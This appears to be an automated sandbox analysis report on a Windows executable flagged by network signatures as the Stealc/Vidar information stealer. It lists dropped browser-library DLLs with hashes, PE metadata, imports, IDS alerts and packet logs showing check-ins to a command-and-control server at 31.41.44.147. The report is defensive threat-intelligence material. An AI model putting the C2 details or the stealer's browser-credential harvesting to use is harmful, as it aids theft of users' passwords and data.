                                            SHA-512:1A531FA1CD3EDD1C78B8655A2E2FA9A183E2196141F56ED2C398C1FD6E1BDF39DD572AEEFD9FD211158A32311F7B0484085A7DEA5FB749895D00C08EA20BA9D6
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):685392
                                            Entropy (8bit):6.872871740790978
                                            Encrypted:false
                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):608080
                                            Entropy (8bit):6.833616094889818
                                            Encrypted:false
                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):450024
                                            Entropy (8bit):6.673992339875127
                                            Encrypted:false
                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1815519
                                            Entropy (8bit):6.634812314798213
                                            Encrypted:false
                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzo:J7Tf8J1Q+q
                                            MD5:7D191EE364B1851D2E42F34E609B9C20
                                            SHA1:8D2396AF483E19522D500984908F854D61A04A44
                                            SHA-256:724F186341F020B14781246C5CEB26962C18D322F4C96439EFA7BBE28D151DE7
                                            SHA-512:A1BC8DCDB1E64C000134440B122B898549B46C1F2E928C4DCC073AC3E04FD7B3D9375A7A87E900238749BFABDC17E1E4C7CF6644F1F37853D3696CB04C9ED78E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):257872
                                            Entropy (8bit):6.727482641240852
                                            Encrypted:false
                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

                                            Download File
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):55296
                                            Entropy (8bit):6.558106649929844
                                            Encrypted:false
                                            SSDEEP:768:lK+3U7KL+LAPRycNr1gyIjFxv5ePM5et/jw1UgS05/w7uxgczc74BuRJNd6NRJ3M:lw2886xv555et/MCsjw0BuRK3jteoe
                                            MD5:ABE1198FEA554BA7456D12709E9C788D
                                            SHA1:1DE434DCFA780C88A75EC3502A9CE6363D05943B
                                            SHA-256:1776DF92E6C198A7360F1EB13ECAD1630DFA0655CB9E52C086EFB9503277C9F6
                                            SHA-512:1A531FA1CD3EDD1C78B8655A2E2FA9A183E2196141F56ED2C398C1FD6E1BDF39DD572AEEFD9FD211158A32311F7B0484085A7DEA5FB749895D00C08EA20BA9D6
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):5.920409946909827
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:FFAk2gixx5.exe
                                            File size:296'960 bytes
                                            MD5:14cd6d9cbad80b0e4076212bf7ad937f
                                            SHA1:6f553fad2fd973d52dec55582490eb8c3a35b6e1
                                            SHA256:1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
                                            SHA512:ca8e1d03dec6ec41eba8b169ef3ce70a1f0acde0c0a9592d99f0d0013577647826a1711ef923b19bb00abc0a87cca240a042f3a237cec13ded5793519d7d56cf
                                            SSDEEP:3072:89dR4sFy2KJnd64kX/qCdx7Hto4r7uYl4HN+5BOlmXvg1T/dO:89dR4I58ndnkXiCpTeYl4HNyO8XYt/w
                                            TLSH:9F549E002590E823DF964771591DCEE0662FBC618BF4929E7214379F29B31A2712EB7F
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x2...a...a...a...a...a...a...a...a...a.dma...a...a...a...a...a...a...a...a...aRich...a........PE..L...320d...................

                                            File Icon

                                            Icon Hash:1321252d29170f17

                                            Static PE Info

                                            General

                                            Entrypoint:0x401604
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x64303233 [Fri Apr 7 15:09:39 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:be37cfa8808e82b62b6ce7f603a1d7f3

                                            Entrypoint Preview

                                            Instruction
                                            call 00007FD2917FD7C8h
                                            jmp 00007FD2917F9D2Dh
                                            int3
                                            int3
                                            mov ecx, dword ptr [esp+04h]
                                            test ecx, 00000003h
                                            je 00007FD2917F9ED6h
                                            mov al, byte ptr [ecx]
                                            add ecx, 01h
                                            test al, al
                                            je 00007FD2917F9F00h
                                            test ecx, 00000003h
                                            jne 00007FD2917F9EA1h
                                            add eax, 00000000h
                                            lea esp, dword ptr [esp+00000000h]
                                            lea esp, dword ptr [esp+00000000h]
                                            mov eax, dword ptr [ecx]
                                            mov edx, 7EFEFEFFh
                                            add edx, eax
                                            xor eax, FFFFFFFFh
                                            xor eax, edx
                                            add ecx, 04h
                                            test eax, 81010100h
                                            je 00007FD2917F9E9Ah
                                            mov eax, dword ptr [ecx-04h]
                                            test al, al
                                            je 00007FD2917F9EE4h
                                            test ah, ah
                                            je 00007FD2917F9ED6h
                                            test eax, 00FF0000h
                                            je 00007FD2917F9EC5h
                                            test eax, FF000000h
                                            je 00007FD2917F9EB4h
                                            jmp 00007FD2917F9E7Fh
                                            lea eax, dword ptr [ecx-01h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            lea eax, dword ptr [ecx-02h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            lea eax, dword ptr [ecx-03h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            lea eax, dword ptr [ecx-04h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 0040C204h
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007FD2917F9EBEh
                                            test byte ptr [eax], 00000008h
                                            je 00007FD2917F9EB9h
                                            mov dword ptr [ebp-0Ch], 00000000h

                                            Rich Headers

                                            Programming Language:
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [C++] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2efcc0x3c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x26ee0000x17a00.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0xc0000x18c.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xa7b30xa800a348b7fef0847937bda16a227a110ac4False0.6162574404761905data6.584458478900951IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0xc0000x238ca0x23a0063652be27cb3906220238ec6760801edFalse0.6058799342105263data5.920319471747451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x300000x26bd33c0x2800e97657bf7ad1ab2806f27164f93ba97dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x26ee0000x17a000x17a00a862c21bfacd8f779ede71e4ac914e7eFalse0.43974247685185186data5.043845287134813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            GABUWOCEMOXOXATAZIWIV0x27010400x476ASCII text, with very long lines (1142), with no line terminatorsTurkishTurkey0.626970227670753
                                            RT_CURSOR0x27014d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                            RT_CURSOR0x27023980x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                            RT_CURSOR0x27024c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                            RT_ICON0x26ee8500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.4157782515991471
                                            RT_ICON0x26ef6f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5365523465703971
                                            RT_ICON0x26effa00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6054147465437788
                                            RT_ICON0x26f06680x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6575144508670521
                                            RT_ICON0x26f0bd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.49336099585062243
                                            RT_ICON0x26f31780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.5117260787992496
                                            RT_ICON0x26f42200x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5795081967213115
                                            RT_ICON0x26f4ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.6090425531914894
                                            RT_ICON0x26f50880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39632196162046907
                                            RT_ICON0x26f5f300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5185018050541517
                                            RT_ICON0x26f67d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.581221198156682
                                            RT_ICON0x26f6ea00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6257225433526011
                                            RT_ICON0x26f74080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.47313278008298754
                                            RT_ICON0x26f99b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5278688524590164
                                            RT_ICON0x26fa3380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5514184397163121
                                            RT_ICON0x26fa8080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.43976545842217485
                                            RT_ICON0x26fb6b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5613718411552346
                                            RT_ICON0x26fbf580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.597926267281106
                                            RT_ICON0x26fc6200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.6604046242774566
                                            RT_ICON0x26fcb880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3771784232365145
                                            RT_ICON0x26ff1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.4022045028142589
                                            RT_ICON0x27001d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4266393442622951
                                            RT_ICON0x2700b600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4299645390070922
                                            RT_STRING0x2704c780x3f0data0.47023809523809523
                                            RT_STRING0x27050680xb6data0.5824175824175825
                                            RT_STRING0x27051200x682data0.42737094837935174
                                            RT_STRING0x27057a80x156data0.5263157894736842
                                            RT_STRING0x27059000xfedata0.5433070866141733
                                            RT_ACCELERATOR0x27014b80x20data1.09375
                                            RT_GROUP_CURSOR0x27023800x14data1.25
                                            RT_GROUP_CURSOR0x2704a700x22data1.088235294117647
                                            RT_GROUP_ICON0x26f50100x76dataTurkishTurkey0.6610169491525424
                                            RT_GROUP_ICON0x26fa7a00x68dataTurkishTurkey0.7019230769230769
                                            RT_GROUP_ICON0x2700fc80x76dataTurkishTurkey0.6694915254237288
                                            RT_VERSION0x2704a980x1e0data0.5708333333333333

                                            Imports

                                            DLLImport
                                            KERNEL32.dllGetCommState, SetDefaultCommConfigW, FreeEnvironmentStringsA, GetModuleHandleW, GetProcessHeap, GetConsoleAliasesLengthA, GetSystemTimes, GetVolumeInformationA, LoadLibraryW, IsBadCodePtr, GetConsoleAliasExesLengthW, lstrcpynW, GetModuleFileNameW, SetConsoleTitleA, SetCurrentDirectoryA, FindFirstFileExA, EnumCalendarInfoW, SetLastError, GetProcAddress, GetLongPathNameA, GetConsoleDisplayMode, SetFileAttributesA, BuildCommDCBW, SetFileApisToOEM, LoadLibraryA, WriteConsoleA, LocalAlloc, SetConsoleCtrlHandler, HeapWalk, FindAtomA, WaitForMultipleObjects, EnumDateFormatsW, GetSystemTime, GetCurrentDirectoryW, GetLocaleInfoA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle, FlushFileBuffers
                                            ADVAPI32.dllReadEventLogA

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            TurkishTurkey

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/06/24-02:52:39.695594TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1804970831.41.44.147192.168.2.6
                                            05/06/24-02:52:38.714464TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24970780192.168.2.631.41.44.147
                                            05/06/24-02:52:39.070096TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1804970731.41.44.147192.168.2.6
                                            05/06/24-02:52:39.336133TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24970880192.168.2.631.41.44.147
                                            05/06/24-02:52:38.047891TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4970680192.168.2.631.41.44.147

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 6, 2024 02:52:37.787518024 CEST4970680192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.046910048 CEST804970631.41.44.147192.168.2.6
                                            May 6, 2024 02:52:38.047061920 CEST4970680192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.047890902 CEST4970680192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.351459026 CEST804970631.41.44.147192.168.2.6
                                            May 6, 2024 02:52:38.409950972 CEST804970631.41.44.147192.168.2.6
                                            May 6, 2024 02:52:38.410156012 CEST4970680192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.411684036 CEST804970631.41.44.147192.168.2.6
                                            May 6, 2024 02:52:38.411755085 CEST4970680192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.416929007 CEST4970680192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.436707020 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.676016092 CEST804970631.41.44.147192.168.2.6
                                            May 6, 2024 02:52:38.700299978 CEST804970731.41.44.147192.168.2.6
                                            May 6, 2024 02:52:38.700392008 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:38.714463949 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.019650936 CEST804970731.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.070096016 CEST804970731.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.070133924 CEST804970731.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.070174932 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.070200920 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.070417881 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.071690083 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.335900068 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.335971117 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.336133003 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.365117073 CEST804970731.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.365191936 CEST4970780192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.643443108 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.695594072 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.695687056 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.695741892 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.695802927 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.877302885 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.877357960 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.920216084 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.920231104 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:39.920264959 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.920303106 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.920681953 CEST4970880192.168.2.631.41.44.147
                                            May 6, 2024 02:52:39.973120928 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.184652090 CEST804970831.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.234769106 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.234877110 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.235045910 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.235097885 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.495630980 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.495649099 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.495814085 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.496064901 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.496180058 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.496381998 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.594436884 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.594455004 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.594572067 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.683619022 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.944010019 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:43.595019102 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:43.857517958 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:43.857686043 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:43.863915920 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.167375088 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.221414089 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.221450090 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.221497059 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.221517086 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.309515953 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.309644938 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.309648037 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.309703112 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.361118078 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.361227989 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.361238003 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.361273050 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.446191072 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446211100 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446225882 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446239948 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446289062 CEST4971080192.168.2.631.41.44.147
